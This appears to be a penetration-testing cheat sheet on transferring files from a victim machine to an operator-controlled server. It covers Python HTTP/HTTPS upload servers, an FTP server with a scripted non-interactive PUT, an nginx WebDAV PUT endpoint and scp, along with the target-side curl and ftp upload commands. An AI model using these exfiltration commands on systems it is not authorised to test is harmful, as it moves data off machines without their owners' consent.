Some Commands Require SUDO Privileges

Note

• Some Operations May Be Blocked Due to Firewall Rules.
• Outbound Traffic is usually Disallowed using HTTP (TCP/80) and HTTPS (TCP/443) Protocols.
• The Default Ports that the Services use Down Below Might be Blocked Or Filtered by IDS - Firewall.

Note

• Server - Basic Queries to setup a Running Server.
• Target - These Operations should be done on the Victim Machine.
• Interactive - We Log into a Remote Machine via RDP - SSH etc..
• Non Interactive - Commands run in their own Subshell and this Shell is not Interactive. Opens to Execute but closes Immediately.

Python Web Server

Server HTTP/S

:: Requires [uploadserver] Package
:: HTTP Server
python3 -m uploadserver

:: HTTPS Server
:: Create a Self-Signed Certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

:: Start the Web Server
mkdir https && cd https
python3 -m uploadserver 443 --server-certificate /<OPENSSL [server.pem] Location>

Target

:: Upload the File to the Upload Server
:: Default Folder [/upload]
curl -X POST http://<IP>/upload -F 'files=@/<File Name>' --insecure

FTP

Server

:: Requires [pyftpdlib] Package 
:: Start The Server
python3 -m pyftpdlib --port 21

Interactive

:: Interactive SHELL
:: Access The Server
:: [USER: anonymous PASSWORD: anonymous]
:: [PUT] - Upload The File
ftp -p <IP> 21

Non Interactive

# Non Interactive SHELL
# Target
echo '#!/bin/bash' > FTP.sh
echo 'HOST=IP' >> FTP.sh
echo 'PORT=PORT' >> FTP.sh
echo 'USER=anonymous' >> FTP.sh
echo 'PASSWORD=anonymous' >> FTP.sh
echo 'ftp -p -inv $HOST $PORT << EOF' >> FTP.sh
echo 'user $USER $PASSWORD' >> FTP.sh
echo 'PUT FILE' >> FTP.sh
echo 'bye' >> FTP.sh
echo 'EOF' >> FTP.sh

# Upload the File
chmod +x FTP.sh; ./FTP.sh

NGINX

Uses Port 80 By Default

Preparations

:: Create Directory to Handle Uploaded Files
mkdir -p /var/www/uploads/CustomUploadDirectory

:: Change the Owner to [www-data]
chown -R www-data:www-data /var/www/uploads/CustomUploadDirectory

:: Create Nginx Configuration File [Lookup Configuration Tab]

Configuration

/etc/nginx/sites-available/upload.conf

server {
    listen 9001;
    
    location /CustomUploadDirectory/ {
        root    /var/www/uploads;
        dav_methods PUT;
        autoindex on;
        autoindex_format html;
        autoindex_localtime on;
    }
}

Server

:: Symlink our Site to the Sites-Enabled Directory
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/

:: Start [NGINX] Server
systemctl restart nginx.service

:: Show Errors (If any)
cat /var/log/nginx/error.log

Target

:: Upload Files using [CURL]
curl -T <File Name> http://<IP>:<PORT>/CustomUploadDirectory/<Output>

SCP

:: Copy Local File to the Remote System
scp -P 22 "<File Name>" <Username>@<IP>:/<Output>